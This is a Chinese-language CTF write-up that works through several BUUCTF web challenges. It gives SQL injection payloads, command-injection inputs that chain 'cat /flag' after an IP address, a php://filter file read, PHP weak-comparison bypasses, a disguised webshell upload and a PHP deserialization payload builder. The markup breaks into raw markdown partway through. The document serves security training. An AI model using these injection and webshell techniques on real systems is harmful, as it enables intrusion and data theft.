<p>参考链接：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/chalan630/p/12583667.html">https://www.cnblogs.com/chalan630/p/12583667.html</a></p>
<p>​                  <a target="_blank" rel="noopener" href="https://www.cnblogs.com/wjw-zm/p/12359735.html">https://www.cnblogs.com/wjw-zm/p/12359735.html</a></p>
<p>​                  <a target="_blank" rel="noopener" href="https://www.jianshu.com/p/b24b16bd5b88">https://www.jianshu.com/p/b24b16bd5b88</a></p>
<p>​                  <a target="_blank" rel="noopener" href="https://www.jianshu.com/p/36f0772f5ce8">https://www.jianshu.com/p/36f0772f5ce8</a></p>
<h1 id="SUCTF-2019-EasySQL"><a href="#SUCTF-2019-EasySQL" class="headerlink" title="[SUCTF 2019]EasySQL"></a>[SUCTF 2019]EasySQL</h1><p>还是堆叠注入，但是查询到Flag表的时候出现了一些问题，flag被ban掉了，并不能采用传统的堆叠注入查询，</p>
<p>查了wp才知道这边真实的查询语句是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">select $post[&#39;query&#39;]||flag from Flag<br></code></pre></td></tr></table></figure>

<p>也就是前一句为真时，只执行前半句，这里的||是或，那么这边的或需要通过输入0以及非0数字得到的回显进行判断。</p>
<h2 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs mysql">*,1<br>&#x2F;&#x2F;即让查询语句为<br>select *,1||flag from Flag<br>&#x2F;&#x2F;此时的真实查询语句为<br>select *,1 from Flag<br></code></pre></td></tr></table></figure>

<p>利用*查询所有内容，1用于占位，换成别的也行</p>
<h2 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h2><p>让||不是或的意思，而是连接符的意思，进行如下操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">1;set sql_mode&#x3D;PIPES_AS_CONCAT;select 1<br></code></pre></td></tr></table></figure>

<p>如果后面的select 1，不是数字的话，也不能成功获得flag</p>
<h1 id="ACTF2020-新生赛-Exec"><a href="#ACTF2020-新生赛-Exec" class="headerlink" title="[ACTF2020 新生赛]Exec"></a>[ACTF2020 新生赛]Exec</h1><p>命令执行漏洞，利用管道符拿flag</p>
<h2 id="按位或"><a href="#按位或" class="headerlink" title="|按位或"></a>|按位或</h2><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">127.0.0.1</span>|cat /flag #直接执行后面的语句<br></code></pre></td></tr></table></figure>

<h2 id="逻辑或"><a href="#逻辑或" class="headerlink" title="||逻辑或"></a>||逻辑或</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby">aaa<span class="hljs-params">||</span>cat /flag <span class="hljs-comment">#如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句</span><br></code></pre></td></tr></table></figure>

<h2 id="amp-按位与"><a href="#amp-按位与" class="headerlink" title="&amp;按位与"></a>&amp;按位与</h2><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">127.0.0.1</span>&amp;cat /flag #&amp;前面和后面命令都要执行，无论前面真假<br></code></pre></td></tr></table></figure>

<h2 id="amp-amp-逻辑与"><a href="#amp-amp-逻辑与" class="headerlink" title="&amp;&amp;逻辑与"></a>&amp;&amp;逻辑与</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">如果前面为假，后面的命令也不执行，如果前面为真则执行两条命令<br></code></pre></td></tr></table></figure>

<p>但是这里并不成功，怀疑被ban掉了，在本地可执行成功</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125141158738.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125141158738</span></p>
<h2 id="；（linux中与-amp-功能相同）"><a href="#；（linux中与-amp-功能相同）" class="headerlink" title="；（linux中与&amp;功能相同）"></a>；（linux中与&amp;功能相同）</h2><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">127.0.0.1</span>;cat /flag<br></code></pre></td></tr></table></figure>

<h1 id="极客大挑战-2019-Secret-File"><a href="#极客大挑战-2019-Secret-File" class="headerlink" title="[极客大挑战 2019]Secret File"></a>[极客大挑战 2019]Secret File</h1><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125143801788.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125143801788</span></p>
<p>f12看看</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125143929467.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125143929467</span></p>
<p>点进php看看</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125143959877.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125143959877</span></p>
<p>再点一下</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125144017214.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125144017214</span></p>
<p>flag呢？？？？？？？抓个包看看，在点下按钮时抓包<img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125144315452.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125144315452</span></p>
<p>发现出现了action.php,出现了重定向</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125144617949.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125144617949</span></p>
<p>filter没有被过滤掉，那php伪协议读取flag.php</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">?file=php:<span class="hljs-regexp">//</span>convert.base64-encode/resource=flag.php<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125145031110.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125145031110</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125145309883.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125145309883</span></p>
<h1 id="极客大挑战-2019-LoveSQL"><a href="#极客大挑战-2019-LoveSQL" class="headerlink" title="[极客大挑战 2019]LoveSQL"></a>[极客大挑战 2019]LoveSQL</h1><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220125150456014.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220125150456014</span></p>
<p>感觉直接注入就行，除了注释只能用%23</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126135236854.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126135236854</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126135624860.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126135624860</span></p>
<p>当前使用的数据库是geek</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126140100267.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126140100267</span></p>
<p>查到geek中数据表</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126140815301.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126140815301</span></p>
<p>拿到flag</p>
<h1 id="GXYCTF2019-Ping-Ping-Ping"><a href="#GXYCTF2019-Ping-Ping-Ping" class="headerlink" title="[GXYCTF2019]Ping Ping Ping"></a>[GXYCTF2019]Ping Ping Ping</h1><p>一样是去pingip地址，应该也是命令利用的问题</p>
<p>但是<img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126141248002.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126141248002</span></p>
<p>直接拿flag的好事还是不要想了，看看有什么文件</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126144030367.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126144030367</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126144227336.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126144227336</span></p>
<p>拿不到flag，那看看index.php</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126144409142.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126144409142</span></p>
<p>还是不行，{}被过滤了</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126144552339.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126144552339</span></p>
<p>去掉无回显</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220126144854217.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220126144854217</span></p>
<p>有点东西，flag也被ban掉了，</p>
<h2 id="绕过方法一"><a href="#绕过方法一" class="headerlink" title="绕过方法一"></a>绕过方法一</h2><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220205195049252.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220205195049252</span></p>
<p>这里通过变量a赋值实现访问flag.php，绕过f、l、a、g按序出现的检查，同理使用多变量也行，尝试了一下a如果为另外三个字母并不能成功绕过</p>
<h2 id="绕过方法二"><a href="#绕过方法二" class="headerlink" title="绕过方法二"></a>绕过方法二</h2><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220205204017769.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220205204017769</span></p>
<p>把ls的结果作为cat的参数，实现不输入flag读取flag</p>
<h1 id="极客大挑战-2019-Http"><a href="#极客大挑战-2019-Http" class="headerlink" title="[极客大挑战 2019]Http"></a>[极客大挑战 2019]Http</h1><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220127194333230.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220127194333230</span></p>
<p>藏了一个链接</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220127194643316.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220127194643316</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220127194742346.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220127194742346</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220127194759152.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220127194759152</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220127194844700.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220127194844700</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220127195000103.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220127195000103</span></p>
<h1 id="极客大挑战-2019-Knife"><a href="#极客大挑战-2019-Knife" class="headerlink" title="[极客大挑战 2019]Knife"></a>[极客大挑战 2019]Knife</h1><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220127201542703.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220127201542703</span></p>
<p>连shell，然后flag在根目录里</p>
<h1 id="极客大挑战-2019-BuyFlag"><a href="#极客大挑战-2019-BuyFlag" class="headerlink" title="[极客大挑战 2019]BuyFlag"></a>[极客大挑战 2019]BuyFlag</h1><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220131235035117.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220131235035117</span></p>
<p>对user进行修改</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220131235012307.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220131235012307</span></p>
<p>关于如何成为cuiter这件事</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220131235117727.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220131235117727</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220131235217171.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220131235217171</span></p>
<p>密码可能对了但是</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220131235330369.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220131235330369</span></p>
<p>密码不能为纯数字，这里考的是php弱比较</p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-types-comparisons.html#:~:text=PHP%20%E7%B1%BB%E5%9E%8B%E6%AF%94%E8%BE%83%20%E8%99%BD%E7%84%B6%20PHP%20%E6%98%AF%E5%BC%B1%E7%B1%BB%E5%9E%8B%E8%AF%AD%E8%A8%80%EF%BC%8C%E4%BD%86%E4%B9%9F%E9%9C%80%E8%A6%81%E6%98%8E%E7%99%BD%E5%8F%98%E9%87%8F%E7%B1%BB%E5%9E%8B%E5%8F%8A%E5%AE%83%E4%BB%AC%E7%9A%84%E6%84%8F%E4%B9%89%EF%BC%8C%E5%9B%A0%E4%B8%BA%E6%88%91%E4%BB%AC%E7%BB%8F%E5%B8%B8%E9%9C%80%E8%A6%81%E5%AF%B9%20PHP,%E5%8F%98%E9%87%8F%E8%BF%9B%E8%A1%8C%E6%AF%94%E8%BE%83%EF%BC%8C%E5%8C%85%E5%90%AB%E6%9D%BE%E6%95%A3%E5%92%8C%E4%B8%A5%E6%A0%BC%E6%AF%94%E8%BE%83%E3%80%82%20%E6%9D%BE%E6%95%A3%E6%AF%94%E8%BE%83%EF%BC%9A%E4%BD%BF%E7%94%A8%E4%B8%A4%E4%B8%AA%E7%AD%89%E5%8F%B7%20%3D%3D%20%E6%AF%94%E8%BE%83%EF%BC%8C%E5%8F%AA%E6%AF%94%E8%BE%83%E5%80%BC%EF%BC%8C%E4%B8%8D%E6%AF%94%E8%BE%83%E7%B1%BB%E5%9E%8B%E3%80%82%20%E4%B8%A5%E6%A0%BC%E6%AF%94%E8%BE%83%EF%BC%9A%E7%94%A8%E4%B8%89%E4%B8%AA%E7%AD%89%E5%8F%B7%20%3D%3D%3D%20%E6%AF%94%E8%BE%83%EF%BC%8C%E9%99%A4%E4%BA%86%E6%AF%94%E8%BE%83%E5%80%BC%EF%BC%8C%E4%B9%9F%E6%AF%94%E8%BE%83%E7%B1%BB%E5%9E%8B%E3%80%82">https://www.runoob.com/php/php-types-comparisons.html#:~:text=PHP%20%E7%B1%BB%E5%9E%8B%E6%AF%94%E8%BE%83%20%E8%99%BD%E7%84%B6%20PHP%20%E6%98%AF%E5%BC%B1%E7%B1%BB%E5%9E%8B%E8%AF%AD%E8%A8%80%EF%BC%8C%E4%BD%86%E4%B9%9F%E9%9C%80%E8%A6%81%E6%98%8E%E7%99%BD%E5%8F%98%E9%87%8F%E7%B1%BB%E5%9E%8B%E5%8F%8A%E5%AE%83%E4%BB%AC%E7%9A%84%E6%84%8F%E4%B9%89%EF%BC%8C%E5%9B%A0%E4%B8%BA%E6%88%91%E4%BB%AC%E7%BB%8F%E5%B8%B8%E9%9C%80%E8%A6%81%E5%AF%B9%20PHP,%E5%8F%98%E9%87%8F%E8%BF%9B%E8%A1%8C%E6%AF%94%E8%BE%83%EF%BC%8C%E5%8C%85%E5%90%AB%E6%9D%BE%E6%95%A3%E5%92%8C%E4%B8%A5%E6%A0%BC%E6%AF%94%E8%BE%83%E3%80%82%20%E6%9D%BE%E6%95%A3%E6%AF%94%E8%BE%83%EF%BC%9A%E4%BD%BF%E7%94%A8%E4%B8%A4%E4%B8%AA%E7%AD%89%E5%8F%B7%20%3D%3D%20%E6%AF%94%E8%BE%83%EF%BC%8C%E5%8F%AA%E6%AF%94%E8%BE%83%E5%80%BC%EF%BC%8C%E4%B8%8D%E6%AF%94%E8%BE%83%E7%B1%BB%E5%9E%8B%E3%80%82%20%E4%B8%A5%E6%A0%BC%E6%AF%94%E8%BE%83%EF%BC%9A%E7%94%A8%E4%B8%89%E4%B8%AA%E7%AD%89%E5%8F%B7%20%3D%3D%3D%20%E6%AF%94%E8%BE%83%EF%BC%8C%E9%99%A4%E4%BA%86%E6%AF%94%E8%BE%83%E5%80%BC%EF%BC%8C%E4%B9%9F%E6%AF%94%E8%BE%83%E7%B1%BB%E5%9E%8B%E3%80%82</a></p>
<p>那么由于本题只用了==，那么就可以在404后面加一点字符串，使其绕过纯数字的检查,也可以选择%00或者%20进行绕过</p>
<p>（注：%20只能放在404后面，%00都行</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220131235410906.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220131235410906</span></p>
<p>记下来这边有两种操作</p>
<h2 id="方法一：科学记数法"><a href="#方法一：科学记数法" class="headerlink" title="方法一：科学记数法"></a>方法一：科学记数法</h2><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220131235437361.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220131235437361</span></p>
<h2 id="方法二：数组绕过"><a href="#方法二：数组绕过" class="headerlink" title="方法二：数组绕过"></a>方法二：数组绕过</h2><p>money[]=1,旧版本php5.3以前中的strcmp()中如果上传的类型不是字符串，就会返回0，当strcmp()函数判断相等时，函数也会返回0,0与0相等，从而绕过检查。</p>
<p><strong>strcmp ( string $str1 , string $str2 )</strong></p>
<p><strong>参数 str1第一个字符串。str2第二个字符串。如果 str1 小于 str2 返回 &lt; 0； 如果 str1 大于 str2 返回 &gt; 0；如果两者相等，返回 0。</strong></p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://blog.51cto.com/u_15077552/3628715">https://blog.51cto.com/u_15077552/3628715</a></p>
<h1 id="极客大挑战-2019-Upload"><a href="#极客大挑战-2019-Upload" class="headerlink" title="[极客大挑战 2019]Upload"></a>[极客大挑战 2019]Upload</h1><p>当我上传一张图片的时候，我得到了这个</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220206202110356.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220206202110356</span></p>
<p>好的他觉得这不是图片</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220206202600329.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220206202600329</span></p>
<p>抓个包看了一下，文件头好像识别不到，图片类型能够直接输入的也就只有GIF了</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220206204459586.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220206204459586</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220206204522997.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220206204522997</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220206204549790.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220206204549790</span></p>
<p>测试了一下，只要带一个GIF89a的头就行，至于文件类型，只要是image开头的感觉都可以，不一定要和后面的文件头一样</p>
<p>找了一下上传的文件在upload里，那写个一句话的图片🐎</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220206210050708.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220206210050708</span></p>
<p>看来用png做图片🐎不太行</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220206210352410.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220206210352410</span></p>
<p>我收起这个想法</p>
<p>直接写算了</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220206210555010.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220206210555010</span></p>
<?被过滤了，那换一种写法

尝试访问，无法执行

![image-20220206211433888](buu1-web/image-20220206211433888.png)

换成php被过滤了

![image-20220206215838590](buu1-web/image-20220206215838590.png)

![image-20220206215902886](buu1-web/image-20220206215902886.png)

![image-20220206222539779](buu1-web/image-20220206222539779.png)

![image-20220206223152521](buu1-web/image-20220206223152521.png)

![image-20220206223240338](buu1-web/image-20220206223240338.png)

![image-20220206223818978](buu1-web/image-20220206223818978.png)

![image-20220206223925673](buu1-web/image-20220206223925673.png)

# [极客大挑战 2019]PHP

![image-20220313160154328](buu1-web/image-20220313160154328.png)

是可爱猫猫~~~，提到了备份就可以考虑一下源码泄露，扫一下可以得到www.zip，（buu疯狂ban我）

![image-20220313160531929](buu1-web/image-20220313160531929.png)

![image-20220313160552517](buu1-web/image-20220313160552517.png)

![image-20220313161147279](buu1-web/image-20220313161147279.png)

考的是序列化与反序列化，这里get传参参数用的是select,然后这里需要构造一个Name的类，username为admin，password为100

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Name</span></span>&#123;<br>	<span class="hljs-keyword">private</span> $username;<br>	<span class="hljs-keyword">private</span> $password;<br><br>	<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params">$username,  $password</span>)</span><br><span class="hljs-function">	</span>&#123;<br>		<span class="hljs-keyword">$this</span>-&gt;username = $username;<br>		<span class="hljs-keyword">$this</span>-&gt;password = $password;<br>	&#125;<br><br>&#125;<br>$user = <span class="hljs-keyword">new</span> Name(<span class="hljs-string">&#x27;admin&#x27;</span>,<span class="hljs-number">100</span>);<br>var_dump(serialize($user)); <span class="hljs-comment">//string(77) &quot;O:4:&quot;Name&quot;:2:&#123;s:14:&quot;%00Nameusername&quot;;s:5:&quot;admin&quot;;s:14:&quot;Namepassword&quot;;i:100;&#125;&quot;</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table>

然而这样并不足以绕过，可以将序列化的Name对象作为select参数的值提交。当执行反序列化之后，又恢复成Name对象，并且，在Name对象销毁时，会自动调用`__destruct()`方法。

当时这里用个问题，就是在执行`__destruct()`方法之前，可能会先执行wakeup()方法，并且在**`wakeup()`会修改username的值**。

因此，这里**应该绕过wakeup()方法**，避免`wakeup()`执行。

